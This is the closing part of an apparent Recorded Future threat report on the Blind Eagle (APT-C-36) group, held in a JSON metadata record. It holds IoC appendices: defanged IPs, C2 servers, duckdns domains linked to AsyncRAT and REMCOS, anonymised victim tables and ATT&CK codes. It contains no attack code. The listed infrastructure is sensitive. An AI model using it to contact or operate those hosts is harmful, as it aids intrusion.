ceb95bc0912b39f9b94327b7ba8e6c989aa29205c3819184\r\nfe08793903f42d16cbac8a5b766d403a7c2f48e85672782e96197387adc4ec61\r\nfe92d0f395ec3d9a658bb3372318a9ddee1a7819f82ffcdf2cc98044d2a70f3b\r\n \r\nPossibly Compromised Network Devices:\r\n8[.]242[.]185[.]28\r\n38[.]10[.]181[.]2\r\n38[.]51[.]232[.]73\r\n38[.]51[.]243[.]33\r\n38[.]52[.]156[.]157\r\n38[.]52[.]157[.]13\r\n38[.]191[.]200[.]22\r\n38[.]191[.]211[.]165\r\n45[.]169[.]38[.]202\r\n45[.]173[.]12[.]108\r\n64[.]76[.]53[.]93\r\n138[.]0[.]90[.]150\r\n143[.]137[.]98[.]182\r\n143[.]137[.]99[.]214\r\n152[.]200[.]146[.]245\r\n152[.]203[.]33[.]47\r\n152[.]231[.]30[.]83\r\n161[.]10[.]134[.]110\r\n170[.]239[.]205[.]17\r\n177[.]253[.]232[.]42\r\n179[.]1[.]85[.]155\r\n179[.]32[.]41[.]81\r\n179[.]189[.]222[.]53\r\n181[.]33[.]141[.]47\r\n181[.]118[.]156[.]251\r\n181[.]204[.]42[.]51\r\n181[.]225[.]72[.]167\r\n181[.]233[.]154[.]8\r\n181[.]233[.]154[.]17\r\n181[.]236[.]232[.]212\r\n185[.]75[.]12[.]39\r\n186[.]121[.]70[.]159\r\n186[.]168[.]153[.]205\r\n186[.]190[.]231[.]215\r\n190[.]0[.]246[.]233\r\n190[.]14[.]253[.]207\r\n190[.]60[.]35[.]218\r\n190[.]60[.]55[.]14\r\n190[.]102[.]120[.]123\r\n \r\n39 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n190[.]121[.]144[.]10\r\n190[.]121[.]150[.]213\r\n201[.]182[.]249[.]194\r\n201[.]182[.]249[.]243\r\n201[.]184[.]74[.]141\r\n \r\n \r\n40 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix C: Cluster 1 Victims\r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 1 Government 146[.]70[.]137[.]90 2025-05-20 2025-05-23\r\n146[.]70[.]51[.]42 2025-05-30 2025-06-09\r\nVictim 2 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 3 Government 146[.]70[.]51[.]42 2025-05-20 2025-06-04\r\nVictim 4 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\n146[.]70[.]83[.]218 2025-05-26 2025-05-26\r\nVictim 5 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-05\r\n146[.]70[.]51[.]42 2025-05-20 2025-05-20\r\nVictim 6 Education 146[.]70[.]51[.]42 2025-05-27 2025-06-03\r\nVictim 7 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-05\r\nVictim 8 Government 146[.]70[.]137[.]90 2025-05-12 2025-06-09\r\nVictim 9 Government 146[.]70[.]137[.]90 2025-05-24 2025-06-06\r\n193[.]56[.]253[.]66 2025-06-10 2025-06-10\r\nVictim 10 Government 146[.]70[.]137[.]90 2025-05-08 2025-05-30\r\nVictim 11 Government 146[.]70[.]137[.]90 2025-05-20 2025-06-09\r\nVictim 12 Healthcare 146[.]70[.]137[.]90 2025-04-30 2025-06-09\r\n193[.]56[.]253[.]66 2025-06-13 2025-06-13\r\n45[.]133[.]180[.]26 2025-05-06 2025-05-09\r\nVictim 13 Government 146[.]70[.]137[.]90 2025-05-28 2025-06-10\r\nVictim 14 Government 146[.]70[.]137[.]90 2025-06-06 2025-06-09\r\nVictim 15 Government 146[.]70[.]83[.]218 2025-05-28 2025-05-29\r\nVictim 16 Retail 146[.]70[.]83[.]218 2025-05-27 2025-05-30\r\n \r\n41 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nSuspected Victim Sector C2 Server(s) First Seen Last Seen\r\nVictim 17 Transport 146[.]70[.]83[.]218 2025-05-26 2025-05-29\r\nVictim 18 Education 146[.]70[.]83[.]218 2025-05-29 2025-05-29\r\nVictim 19 Education 45[.]133[.]180[.]130 2025-03-19 2025-03-26\r\n146[.]70[.]57[.]58 2025-04-02 2025-04-02\r\n45[.]133[.]180[.]154 2025-03-31 2025-04-08\r\n \r\n \r\n42 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix D: Cluster 2 IP Addresses\r\nIP Address ASN Suspected Type Malware Families\r\n45[.]77[.]72[.]102 AS20473 Virtual Private Server AsyncRAT\r\n64[.]188[.]9[.]172 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]173 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]175 AS36352 Proxy Server AsyncRAT\r\n64[.]188[.]9[.]177 AS36352 Proxy Server AsyncRAT\r\n179[.]14[.]8[.]131 AS27831 Colombian ISP AsyncRAT\r\n181[.]131[.]217[.]63 AS13489 Colombian ISP AsyncRAT\r\n \r\n \r\n43 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix E: “deadpoolstart”-Themed Domains Linked to Cluster 2\r\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2024[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-23 2025-03-12\r\ndeadpoolstart2025[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-21\r\ndeadpoolstart2025[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-13 2024-12-13\r\n192[.]169[.]69[.]26 2024-12-16 2025-05-20\r\ndeadpoolstart2026[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-14 2025-07-09\r\ndeadpoolstart2026[.]duckdns[.]org 179[.]14[.]11[.]213 2024-12-20 2024-12-20\r\n192[.]169[.]69[.]26 2025-01-25 2025-07-18\r\ndeadpoolstart2027[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-24 2025-07-14\r\ndeadpoolstart2027[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-07 2024-11-07\r\n192[.]169[.]69[.]26 2025-03-12 2025-03-12\r\ndeadpoolstart2028[.]con-ip[.]com 64[.]188[.]9[.]172 2024-08-29 2025-07-16\r\ndeadpoolstart2028[.]duckdns[.]org 172[.]93[.]160[.]188 2024-11-06 2024-11-07\r\ndeadpoolstart2029[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-22 2025-06-30\r\ndeadpoolstart2029[.]duckdns[.]org 192[.]169[.]69[.]26 2025-03-03 2025-03-12\r\ndeadpoolstart2030[.]con-ip[.]com 64[.]188[.]9[.]172 2024-09-25 2025-07-15\r\ndeadpoolstart2030[.]duckdns[.]org 172[.]93[.]160[.]188 2024-10-30 2024-10-30\r\n192[.]169[.]69[.]26 2025-03-03 2025-03-03\r\ndeadpoolstart2033[.]duckdns[.]org 191[.]88[.]249[.]175 2025-02-12 2025-02-12\r\ndeadpoolstart2034[.]duckdns[.]org 191[.]88[.]249[.]175 2025-03-27 2025-03-27\r\ndeadpoolstart2035[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-28 2025-01-28\r\n192[.]169[.]69[.]26 2025-01-31 2025-07-17\r\ndeadpoolstart2036[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-29 2025-02-03\r\n192[.]169[.]69[.]26 2025-02-03 2025-07-18\r\n \r\n44 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nDomain IP Address First Seen Last Seen\r\ndeadpoolstart2037[.]duckdns[.]org 179[.]14[.]11[.]213 2025-01-30 2025-02-03\r\n192[.]169[.]69[.]26 2025-02-03 2025-07-17\r\ndeadpoolstart2038[.]duckdns[.]org 192[.]169[.]69[.]26 2025-02-05 2025-02-05\r\ndeadpoolstart2041[.]duckdns[.]org 179[.]14[.]8[.]131 2025-06-09 2025-06-09\r\ndeadpoolstart2044[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-09 2025-05-09\r\n191[.]88[.]249[.]175 2025-03-12 2025-03-12\r\ndeadpoolstart2049[.]duckdns[.]org 179[.]14[.]8[.]131 2025-07-11 2025-07-11\r\n177[.]255[.]84[.]173 2025-04-12 2025-04-12\r\ndeadpoolstart2051[.]duckdns[.]org 192[.]169[.]69[.]26 2025-05-02 2025-07-18\r\n177[.]255[.]84[.]173 2025-04-29 2025-05-01\r\ndeadpoolstart2052[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2053[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-11 2025-05-11\r\ndeadpoolstart2054[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-26 2025-05-26\r\ndeadpoolstart2059[.]duckdns[.]org 179[.]14[.]8[.]131 2025-05-23 2025-05-23\r\ndeadpoolstart2060[.]duckdns[.]org 192[.]169[.]69[.]26 2025-06-29 2025-07-21\r\ndeadpoolstart2061[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-17 2025-06-30\r\n192[.]169[.]69[.]26 2025-06-30 2025-07-17\r\ndeadpoolstart2063[.]duckdns[.]org 181[.]131[.]217[.]63 2025-06-29 2025-06-29\r\ndeadpoolstart2064[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-03 2025-07-04\r\ndeadpoolstart2065[.]duckdns[.]org 181[.]131[.]217[.]63 2025-07-04 2025-07-05\r\n \r\n \r\n45 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix F: Cluster 2 Victims\r\nSuspected\r\nVictim\r\nSector C2 Server(s) First Seen Last Seen\r\nVictim 20 Government 64[.]188[.]9[.]173 2024-10-11 2024-10-22\r\n64[.]188[.]9[.]177 2024-10-16 2024-10-16\r\nVictim 21 Transport 64[.]188[.]9[.]173 2024-10-11 2024-10-21\r\nVictim 22 Education 64[.]188[.]9[.]177 2024-10-16 2024-10-31\r\nVictim 23 Education 64[.]188[.]9[.]177 2024-10-19 2024-10-19\r\nVictim 24 Government 64[.]188[.]9[.]172\r\n \r\n2024-10-01 2024-10-06\r\nVictim 25 Government /\r\nDefense\r\n64[.]188[.]9[.]172\r\n \r\n2024-10-11 2024-10-15\r\nVictim 26 Government 64[.]188[.]9[.]173 2024-10-24 2024-10-24\r\nVictim 27 Retail 64[.]188[.]9[.]177 2024-12-20 2024-12-20\r\nVictim 28 Oil 64[.]188[.]9[.]173 2024-10-11 2024-10-30\r\n \r\n \r\n46 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix G: Cluster 3 IP Addresses\r\nIP Address ASN Type Malware Families\r\n181[.]131[.]216[.]206 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]218[.]182 AS13489 Colombian ISP REMCOS RAT\r\n181[.]131[.]219[.]42 AS13489 Colombian ISP REMCOS RAT, AsyncRAT\r\n \r\n \r\n \r\n47 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix H: Cluster 4 IP Addresses\r\nIP Address ASN Suspected Type Malware Family\r\n45[.]135[.]232[.]38 AS198953 Virtual Private Server AsyncRAT\r\n46[.]246[.]82[.]9 AS42708 Virtual Private Server XWorm\r\n89[.]117[.]23[.]25 AS40021 Virtual Private Server REMCOS RAT\r\n178[.]73[.]218[.]8 AS42708 Virtual Private Server AsyncRAT\r\n181[.]235[.]3[.]0 AS3816 Colombian ISP AsyncRAT\r\n191[.]93[.]113[.]151 AS27831 Colombian ISP AsyncRAT\r\n \r\n \r\n48 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix I: Cluster 5 Domains\r\nDomain First Seen Last Seen Malware Families\r\n2seguro2025[.]duckdns[.]org 2025-04-01 2025-07-09 N/A\r\nansy10jun[.]duckdns[.]org 2025-06-21 2025-06-29 AsyncRAT\r\nansy1703[.]duckdns[.]org 2025-03-20 2025-06-14 AsyncRAT\r\nasegurar2octubre[.]duckdns[.]org 2025-03-12 2025-07-17 AsyncRAT\r\nasegurar3octubre[.]duckdns[.]org 2025-05-08 2025-07-18 AsyncRAT\r\nbb2023[.]duckdns[.]org 2025-06-13 2025-07-10 N/A\r\ndcabril[.]duckdns[.]org 2025-06-13 2025-07-19 N/A\r\ngotemburgoxm[.]duckdns[.]org 2025-05-07 2025-07-15 REMCOS RAT, XWorm\r\nromanovas[.]duckdns[.]org 2025-03-04 2025-06-19 LimeRAT\r\n \r\n \r\n49 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix J: Original SVG Attachment\r\n \r\n \r\n \r\n50 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix K: MITRE ATT\u0026CK Techniques\r\nTactic: Technique ATT\u0026CK Code\r\nCommand and Control: Application Layer Protocol: Web Protocols T1071.001\r\nCommand and Control: Encrypted Channel: Asymmetric Cryptography T1573.002\r\nCommand and Control: Encrypted Channel: Symmetric Cryptography T1573.001\r\nCommand and Control: Ingress Tool Transfer T1105\r\nDefense Evasion: Modify Registry T1112\r\nDiscovery: System Information Discovery T1082\r\nDiscovery: Query Registry T1012\r\nExecution: Command and Scripting Interpreter: PowerShell T1059.001\r\nInitial Access: Spearphishing Link T1566.002\r\nResource Development: Acquire Infrastructure: Domains T1583.001\r\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\r\nResource Development: Acquire Infrastructure: Server T1583.004\r\nResource Development: Acquire Infrastructure: Malvertising T1583.008\r\nResource Development: Compromise Infrastructure: Server T1584.004\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n51 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nRecorded Future reporting contains expressions of likelihood or probability consistent\r\nwith US Intelligence Community Directive (ICD) 203: Analytic Standards (published\r\nJanuary 2, 2015). Recorded Future reporting also uses confidence level standards\r\nemployed by the US Intelligence Community to assess the quality and quantity of the\r\nsource information supporting our analytic judgments.\r\n \r\nAbout Insikt Group\r\n®\r\nRecorded Future’s Insikt Group, the company’s threat research division, comprises\r\nanalysts and security researchers with deep government, law enforcement, military, and\r\nintelligence agency experience. Their mission is to produce intelligence that reduces risk\r\nfor customers, enables tangible outcomes, and prevents business disruption.\r\n \r\nAbout Recorded Future\r\n®\r\nRecorded Future is the world’s largest intelligence company. The Recorded Future\r\nIntelligence Operations Platform provides the most complete coverage across\r\nadversaries, infrastructure, and targets. By combining precise, AI-driven analytics with\r\nthe Intelligence Graph® populated by specialized threat data, Recorded Future enables\r\ncyber teams to see the complete picture, act with confidence, and get ahead of threats\r\nthat matter before they impact your business. Headquartered in Boston with offices\r\naround the world, Recorded Future works with more than 1,900 businesses and\r\ngovernment organizations across 80 countries.\r\nLearn more at recordedfuture.com\r\n \r\n52 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "pdf" ], "references": [ "https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0826.pdf" ], "report_names": [ "cta-2025-0826.pdf" ], "threat_actors": [ { "id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813", "created_at": "2022-10-25T15:50:23.688973Z", "updated_at": "2026-04-29T06:58:57.691272Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "APT-C-36", "Blind Eagle", "TAG-144", "AguilaCiega", "APT-Q-98" ], "source_name": "MITRE:APT-C-36", "tools": [ "njRAT", "Imminent Monitor", "DCRAT", "PureCrypter", "Caminho", "Remcos", "AsyncRAT", "QuasarRAT", "HeartCrypt" ], "source_id": "MITRE", "reports": null }, { "id": "be597b07-0cde-47bc-80c3-790a8df34af4", "created_at": "2022-10-25T16:07:23.407484Z", "updated_at": "2026-04-29T06:58:57.790051Z", "deleted_at": null, "main_name": "Blind Eagle", "aliases": [ "APT-C-36", "APT-Q-98", "AguilaCiega", "G0099" ], "source_name": "ETDA:Blind Eagle", "tools": [ "AsyncRAT", "BitRAT", "Bladabindi", "BlotchyQuasar", "Imminent Monitor", "Imminent Monitor RAT", "Jorik", "LimeRAT", "Remcos", "RemcosRAT", "Remvio", "Socmer", "Warzone", "Warzone RAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "bd43391b-b835-4cb3-839a-d830aa1a3410", "created_at": "2023-01-06T13:46:38.925525Z", "updated_at": "2026-04-29T06:58:56.373654Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "Blind Eagle" ], "source_name": "MISPGALAXY:APT-C-36", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1777429251, "ts_updated_at": 1777450954, "ts_creation_date": 1756135088, "ts_modification_date": 1756135105, "files": { "pdf": "https://archive.orkl.eu/ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f.pdf", "text": "https://archive.orkl.eu/ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f.txt", "img": "https://archive.orkl.eu/ddfb075f6b359d1ee826fda08c1afd1b8bce8d4f.jpg" } }